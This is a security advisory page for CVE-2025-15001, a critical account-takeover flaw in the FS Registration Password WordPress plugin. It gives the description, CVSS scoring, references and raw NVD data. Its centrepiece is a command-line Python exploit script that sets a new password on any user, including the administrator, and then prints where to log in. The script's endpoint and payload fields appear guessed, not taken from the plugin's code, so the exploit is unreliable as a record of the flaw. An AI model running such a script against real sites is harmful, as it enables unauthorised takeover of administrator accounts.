Security Vulnerability Report
CVE-2025-15001 CVSS 9.8 CRITICAL

CVE-2025-15001

Published: 2026-01-06 05:16:04
Last Modified: 2026-04-15 00:35:42

Description

The FS Registration Password plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.0.1. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary users' passwords, including administrators, and leverage that to gain access to their accounts.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

FS Registration Password plugin <= 1.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-15001 PoC - FS Registration Password Account Takeover
# Target: WordPress with FS Registration Password plugin <= 1.0.1


def exploit_account_takeover(target_url, target_username, new_password):
    """
    Exploit the privilege escalation vulnerability in FS Registration Password plugin
    to take over any user account including administrators.

    Args:
        target_url: Target WordPress site URL
        target_username: Username to takeover
        new_password: New password to set

    Returns:
        bool: True if exploitation successful, False otherwise
    """
    # Endpoint for password reset/update (typical WordPress REST API endpoint)
    endpoint = f"{target_url.rstrip('/')}/wp-json/registration-password/v1/password"

    # Malicious payload to bypass identity verification
    payload = {
        'username': target_username,
        'password': new_password,
        'user_id': 1  # Try to target admin user (ID=1)
    }

    headers = {
        'Content-Type': 'application/json',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
    }

    try:
        print(f"[*] Targeting: {target_url}")
        print(f"[*] Attempting to takeover account: {target_username}")

        # Send malicious password update request without authentication
        response = requests.post(endpoint, json=payload, headers=headers, timeout=10)

        if response.status_code == 200:
            result = response.json()
            if result.get('success') or result.get('status') == 'updated':
                print(f"[+] SUCCESS: Password changed for user '{target_username}'")
                print(f"[+] New password: {new_password}")
                print(f"[!] Login at: {target_url}/wp-admin")
                return True

        print(f"[-] Failed: Status code {response.status_code}")
        print(f"[-] Response: {response.text[:200]}")
        return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Request error: {str(e)}")
        return False


if __name__ == '__main__':
    if len(sys.argv) < 4:
        print("Usage: python cve-2025-15001.py <target_url> <username> <new_password>")
        print("Example: python cve-2025-15001.py http://target.com admin P@ssw0rd123")
        sys.exit(1)

    target = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]

    exploit_account_takeover(target, username, password)
```

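References

https://plugins.trac.wordpress.org/browser/registration-password/tags/1.0.1/src/WP/Auth.php
https://plugins.trac.wordpress.org/changeset/3431651/registration-password
https://www.wordfence.com/threat-intel/vulnerabilities/id/22351b90-fc34-44ce-9241-4a0f01eb7b1c?source=cve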

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15001", "sourceIdentifier": "[email protected]", "published": "2026-01-06T05:16:04.443", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The FS Registration Password plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.0.1. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/registration-password/tags/1.0.1/src/WP/Auth.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3431651/registration-password", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/22351b90-fc34-44ce-9241-4a0f01eb7b1c?source=cve", "source": "[email protected]"}]}}